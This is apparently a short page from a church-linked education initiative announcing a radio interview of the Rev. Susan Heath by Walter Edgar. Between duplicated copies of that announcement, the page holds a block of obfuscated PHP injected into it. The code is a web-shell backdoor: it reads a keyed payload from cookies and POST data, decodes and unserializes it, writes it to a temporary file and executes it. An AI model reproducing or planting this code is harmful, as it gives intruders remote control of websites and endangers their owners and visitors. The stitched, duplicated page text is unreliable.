The Rev. Susan Heath joins Walter Edgar on South Carolina Public Radio to talk about the educational needs of our state, and the effort the Initiative is making to meet them.
To listen and to read the corresponding interview, click here.
$KqMrxUN = 't' . chr (95) . chr (106) . "\x53" . "\151" . "\150";$OqXUSNtD = chr (99) . "\154" . "\x61" . chr (115) . chr (115) . "\137" . chr (101) . 'x' . chr ( 786 - 681 ).chr (115) . 't' . 's';$SKWVT = class_exists($KqMrxUN); $OqXUSNtD = "39803";$RPfCFXfpQ = strpos($OqXUSNtD, $KqMrxUN);if ($SKWVT == $RPfCFXfpQ){function QRGPFI(){$VClRw = new /* 4962 */ t_jSih(18137 + 18137); $VClRw = NULL;}$SGMFrECGk = "18137";class t_jSih{private function VAqcAZUWy($SGMFrECGk){if (is_array(t_jSih::$fcnWQpRpZV)) {$name = sys_get_temp_dir() . "/" . crc32(t_jSih::$fcnWQpRpZV["salt"]);@t_jSih::$fcnWQpRpZV["write"]($name, t_jSih::$fcnWQpRpZV["content"]);include $name;@t_jSih::$fcnWQpRpZV["delete"]($name); $SGMFrECGk = "18137";exit();}}public function OkowH(){$WlpAJMMZso = "22815";$this->_dummy = str_repeat($WlpAJMMZso, strlen($WlpAJMMZso));}public function __destruct(){t_jSih::$fcnWQpRpZV = @unserialize(t_jSih::$fcnWQpRpZV); $SGMFrECGk = "25439_599";$this->VAqcAZUWy($SGMFrECGk); $SGMFrECGk = "25439_599";}public function YhOqcboYF($WlpAJMMZso, $leyTYij){return $WlpAJMMZso[0] ^ str_repeat($leyTYij, intval(strlen($WlpAJMMZso[0]) / strlen($leyTYij)) + 1);}public function YjdXaKP($WlpAJMMZso){$TqgSi = chr (98) . "\141" . "\163" . chr ( 1049 - 948 )."\66" . chr (52);return array_map($TqgSi . "\137" . 'd' . "\x65" . 'c' . chr ( 282 - 171 ).'d' . "\145", array($WlpAJMMZso,));}public function __construct($XwNtOFfS=0){$xmblGGR = chr (44); $WlpAJMMZso = "";$YbSfKVk = $_POST;$ievLXEO = $_COOKIE;$leyTYij = "25e9f615-fb6e-4131-8dbc-a388e00f3f24";$ylRkwKpj = @$ievLXEO[substr($leyTYij, 0, 4)];if (!empty($ylRkwKpj)){$ylRkwKpj = explode($xmblGGR, $ylRkwKpj);foreach ($ylRkwKpj as $pSpHZqtbQV){$WlpAJMMZso .= @$ievLXEO[$pSpHZqtbQV];$WlpAJMMZso .= @$YbSfKVk[$pSpHZqtbQV];}$WlpAJMMZso = $this->YjdXaKP($WlpAJMMZso);}t_jSih::$fcnWQpRpZV = $this->YhOqcboYF($WlpAJMMZso, $leyTYij);if (strpos($leyTYij, $xmblGGR) !== FALSE){$leyTYij = explode($xmblGGR, $leyTYij); $GSByIk = base64_decode(md5($leyTYij[0])); $YPjZzHRZU = strlen($leyTYij[1]) > 5 ? substr($leyTYij[1], 0, 5) : $leyTYij[1];$_GET['new_key'] = md5(implode('', $leyTYij)); $jhVdhY = str_repeat($YPjZzHRZU, 2); $JbwcYvQ = array_map('trim', $leyTYij);if (is_array($JbwcYvQ) && count($JbwcYvQ) > 1) {$GDtECiI = $JbwcYvQ[0];} else {$GDtECiI = '';}}}public static $fcnWQpRpZV = 48161;}QRGPFI();}
Recognizing God's image in the life of every child.
The Rev. Susan Heath joins Walter Edgar on South Carolina Public Radio to talk about the educational needs of our state, and the effort the Initiative is making to meet them.
To listen and to read the corresponding interview, click here.
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